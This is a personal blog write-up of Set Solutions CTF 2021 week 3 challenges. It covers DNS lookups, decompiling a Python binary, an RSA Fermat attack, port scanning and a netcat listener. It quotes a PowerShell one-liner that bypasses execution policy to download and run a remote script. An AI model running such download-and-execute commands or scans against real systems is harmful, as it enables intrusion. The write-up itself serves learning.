Set Solutions CTF 2021 Week 3
Week 1 \ Week 2 \ Week 4
Note: Fewer challenge details were documented during week 3. The website went down shortly after the CTF ended, before I was able to thoroughly document challenge prompts and steps
To skip to detailed writeups from week 3, start reading at Captured Communication.
Save the Lizards
Note: I forgot to record the description for this challenge, however, it contained the text
.today is a top-level domain, and a WHOIS lookup revealed that savethelizards.today was a registered domain. A DNS record lookup of savethelizards.today revealed a TXT entry containing the flag.
You Have Mail
Note: I forgot to record the description and many steps taken for this challenge
You Have Mail lead me to a Windows bat script which contained code to download and execute a remote PowerShell script titled ftony.ps1
PowerShell -NoProfile -NoExit -ExecutionPolicy Bypass -Command iex (New-Object Net.WebClient).DownloadString('https://ssictfstatic.s3.us-east-2.amazonaws.com/ftony.ps1')
I downloaded ftony.ps1 directly with wget and removed a significant amount of the contents, including a large try-catch block regarding a user interface. I pasted the remaining code into https://tio.run/#powershell and clicked run. The flag appeared!
Knocked off Course
The Episilon satellite has been knocked off course. We can attempt some course correction maneuvers, but our odds are not good. All we’ve got to work with is a chimpanzee that flew up on a recent mission. At best, you have a 1 in 10,000 chance of getting this right.
Challenge attachments: guessNum
Knocked off Course contained a 1.8 MB Linux executable called guessNum. Prior to even executing guessNum, I ran
strings guessNum, and noticed a significant amount of python references, which implied that guessNum may be a compiled python executable.
I extracted the contents of guessNum using pyinstxtractor.py1.
Next, I used uncompyle6 to decompile
guessNum.pyc, one of the files extracted by pyinstxtractor.
Alternatively, Knocked off Course could have been solved by using pwntools to script interaction with guessNum, as delay between each of the ~10000 guesses would be minimal.
We have a Spy! We have captured a public key, and a ciphered message. Let’s catch this spy, otherwise were going to have to reformat the entire system and start over.
Captured Communication provided two attachments, being pub_key and cipher_text. Note that neither of these files were newline terminated, should you decide to try the challenge yourself.
-----BEGIN PUBLIC KEY----- MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQBJfoRSZIBnKN2kwQ5KHDoK jaYFq79T4XufRQ+taIEk/HaxbPy4R1nelT9T+bWrWOylO0IzWDaPW9Hb9pQjEVdO LxJdKpeUUZ/xAt6o2GFV0HJrZ9PQD19KvND6yTU1H2poOzmVU5OuObaq2DD5UqoO UGUdkPfFOU1CGwcP3rhOlTeEWEcuXwZVkJXenWhFXrGjQFbpq3zUfAQ+m7OPh0Y0 Vd6jSJorwoBeA4z3lG+XLsWIdu6uLG755l30k3vtbLLK7tMU8U7li7uCfuCaOn1U 1chbesIu7TejLx7WJHu5YNneCS1L4oC2fFSyEArfUzxPgXKrGcSviqiRaU5NNY81 AgMBAAE= -----END PUBLIC KEY-----
Utilizing openssl, I was able to determine that the public key was RSA encrypted, with the command
openssl asn1parse -in pub_key.
Given that only the public key and cipher text were provided, the next logical CTF step would be to brute force the private key, using RsaCtfTool. The command
python3 RsaCtfTool.py --publickey pub_key --uncipherfile cipher_text resulted in RsaCtfTool attempting multiple types of attacks on the encrypted content. After some time, RsaCtfTool attempted a fermat attack, which succeeded, and the utf-8 output of the decrypted ciphertext contained the flag.
To the Stars
WeAre.ReturningTo.Space And only one way to get there…
Similar to Save the Lizards
, the description of To the Stars contained text that appeared to be a URL. Given that this challenge again involves public internet-facing infrastructure, I wanted to ensure that any actions I took were—with some confidence—against Set Solutions CTF endpoints. WHOIS and DNS queries of WeAre.ReturningTo.Space revealed that the domain was 31 days old and resolved to the IP address of
188.8.131.52, which belonged to an EC2 in the same region as To the Stars.
After initial port scans of
184.108.40.206 revealed nothing, I ran a full syn port scan by executing
sudo nmap -p- 220.127.116.11. The full scan revealed that only a single port, 42731, was open.
A netcat connection to
18.104.22.168 42731 revealed that the EC2 instance was running OpenSSH on port 42731.
Finally, I SSH’d to
22.214.171.124 42731, and some ascii art, along with the flag, was returned in the banner.
Space Force SIGINT has identified a way to intercept foreign communications. Waiting for your input commander, to provide an IP address to redirect the signal to…
The challenge page for poison delivery contained a prompt for an IP address. After trying various ways to break the input form, I realized that the challenge may take a bit more effort.
Presumably, the next steps—or the flag—would be sent to the IP address entered. This challenge is especially interesting because it is very out of the box–it requires the competitor to listen on a public IP address. In retrospect, my steps for Poison Delivery were:
- Spin up a basic, free EC2 instance with a public IP
- Allow all TCP traffic, disable the firewall and listen with tcpdump
- Determine the port that the challenge attempts to send data to
- Listen with netcat on the port discovered in step 3
Caught in the thrill of competition, I sped through each step, forgetting to document along the way. I was able to use my free AWS university account to easily spin up an EC2, which went smoothly. I allowed TCP traffic from all IP addresses to the EC2, disabled its firewall (yikes!) and listened with tcpdump. Eventually, a connection on port 38486 was logged! I setup a listener on port 38486 by executing
nc -lvnp 38486.
Finally, I clicked “intercept communications” one last time, and a request came in containing the flag.
Note: you are going to have to take my word on the flag being contained in the 40 content-length of the request.
Week 3 lessons learned: Do not wait a month to document a CTF competition. The infrastructure will most likely be taken down, and all you will have left is broken RsaCtfTool installs.
Week 1 \ Week 2 \ Week 4